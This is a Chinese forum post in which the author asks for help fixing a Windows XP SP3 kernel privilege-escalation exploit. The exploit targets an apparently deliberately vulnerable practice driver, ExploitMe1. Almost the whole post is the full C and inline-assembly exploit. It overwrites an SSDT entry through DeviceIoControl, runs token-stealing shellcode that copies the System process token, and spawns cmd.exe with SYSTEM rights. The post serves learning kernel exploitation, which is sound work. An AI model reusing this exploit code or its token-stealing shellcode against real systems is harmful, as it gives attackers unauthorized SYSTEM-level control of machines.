我在网上搜到的代码,然后在其基础上修改的,是通过改写SSDT表中NtVdmControl的地址利用漏洞!
但是总是不能成功提权,用WinDbg调试的时候,在exploit1.sys派遣函数位置下断点,发现根本就执行不到。
泉哥建议我把代码发到论坛上面,他说会有很多人帮我的!希望各位朋友指教下,帮我看看这个代码哪里有问题!先在此谢过了。
#include <stdio.h>
#include <windows.h>
#pragma comment (lib, "ntdll.lib")
typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
typedef struct _IMAGE_FIXUP_ENTRY {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
NTSTATUS
(NTAPI *NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG AllocationSize,
IN ULONG AllocationType,
IN ULONG Protect
);
VOID
SetShellCodeToMemory(
PVOID ShellCodeMemory
)
{
OSVERSIONINFOEX OsVersionInfo;
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system\n" );
ExitProcess( 0 );
return;
}
//ShellCode部分实现提权
if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
call CopyXpShellCode
nop
nop
nop
nop
nop
nop
mov eax, 0xFFDFF124 // eax = KPCR (not 3G Mode)
mov eax, [eax]
mov esi, [eax+0x220]
mov eax, esi
searchXp:
mov eax, [eax+0x88]
sub eax, 0x88
mov edx, [eax+0x84]
cmp edx, 0x4 // Find System Process
jne searchXp
mov eax, [eax+0xc8] // 获取system进程的token
mov [esi+0xc8], eax // 修改当前进程的token,以提升当前进程的权限
ret 8
CopyXpShellCode:
pop esi
mov edi, ShellCodeMemory
lea ecx, CopyXpShellCode
sub ecx, esi
cld
rep movsb
}
}
}
int main(int argc, char* argv[])
{
NTSTATUS status;
PVOID ZwVdmControl = NULL;
DWORD HookAddress = 0x80502FBC; //xp sp3
PVOID ShellCodeMemory = (PVOID)0x200;
DWORD MemorySize = 0x1000;
HANDLE deviceHandle;
DWORD dwReturnSize = 0;
SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;
PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;
PVOID InputBuffer = NULL;
printf( "\t----Windows Local Privilege Escalation Vulnerability Exploit----\n" );
//加载驱动并开启
printf( "
Connect SCM ... " );
hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
if ( NULL == hscmHandle ) {
printf( "failed, code: %d\n", GetLastError() );
return 0;
}
printf( "success!!\n" );
printf( "
Open services ... " );
hscDriver = OpenService( hscmHandle, "exploit1", GENERIC_READ | SERVICE_START );
if ( NULL == hscDriver ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscmHandle );
return 0;
}
printf( "success!!\n" );
printf( "
Start services ... " );
//
// 启动ExploitMe1驱动
//
if ( !StartService( hscDriver, 0, NULL ) ) {
if ( ERROR_SERVICE_ALREADY_RUNNING != GetLastError() ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
return 0;
}
}
printf( "success!!\n" );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
NtAllocateVirtualMemory = (long (__stdcall *)(void *,void ** ,unsigned long,unsigned long *,unsigned long,unsigned long))GetProcAddress( LoadLibrary("ntdll.dll"), "NtAllocateVirtualMemory" );
if ( NtAllocateVirtualMemory == NULL ) {
printf( "GetProcAddress failed, code: %d\n" );
return 0;
}
ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );
printf( "
Create execute environment ... " );
status = NtAllocateVirtualMemory( (HANDLE)-1,
&ShellCodeMemory,
0,
&MemorySize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE );
if ( status != STATUS_SUCCESS ) {
printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", status );
return 0;
}
printf( "Ok!\n" );
//
// 初始化 ShellCode
//
memset( ShellCodeMemory, 0x90, MemorySize );
memset( ShellCodeMemory, 0x00, 0x1 );
memset( ((byte*)ShellCodeMemory+1), 0x02, 0x1 );
memset( ((byte*)ShellCodeMemory+2), 0x00, 0x1 );
memset( ((byte*)ShellCodeMemory+3), 0x00, 0x1 );
SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );
deviceHandle = CreateFile("\\\\.\\ExploitMe1",
0,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if ( INVALID_HANDLE_VALUE == deviceHandle ) {
printf( "[-] Open device failed, code: %d\n", GetLastError() );
return 0;
} else {
printf( "
Open device success\n" ); }
//__asm int 3
DeviceIoControl( deviceHandle,
0x8888A003,
InputBuffer,
//在这里传入0地址,内容是shellcode首地址0x00000200
0x4,
(PVOID)HookAddress,
0x4,
&dwReturnSize,
NULL );
//__asm int 3
DeviceIoControl( deviceHandle,
0x8888A003,
InputBuffer,
0x4,
(PVOID)HookAddress,
//该地址被写进内容0x00000200
0x4,
&dwReturnSize,
NULL );
CloseHandle( deviceHandle );
//由于SSDT表中ZwVdmControl的地址已经被改写成ShellCode地址,所以调用之以执行ShellCode
printf( "
call shellcode ... " );
__asm
{
xor ecx,ecx
push ecx
push ecx
mov eax, ZwVdmControl
call eax
}
printf( "Done.\n" );
printf( "
Create New Process\n" );
GetStartupInfo( &stStartup );
//由于该程序已经获得system权限,所以在此创建的程序也应该是system权限
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi );
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!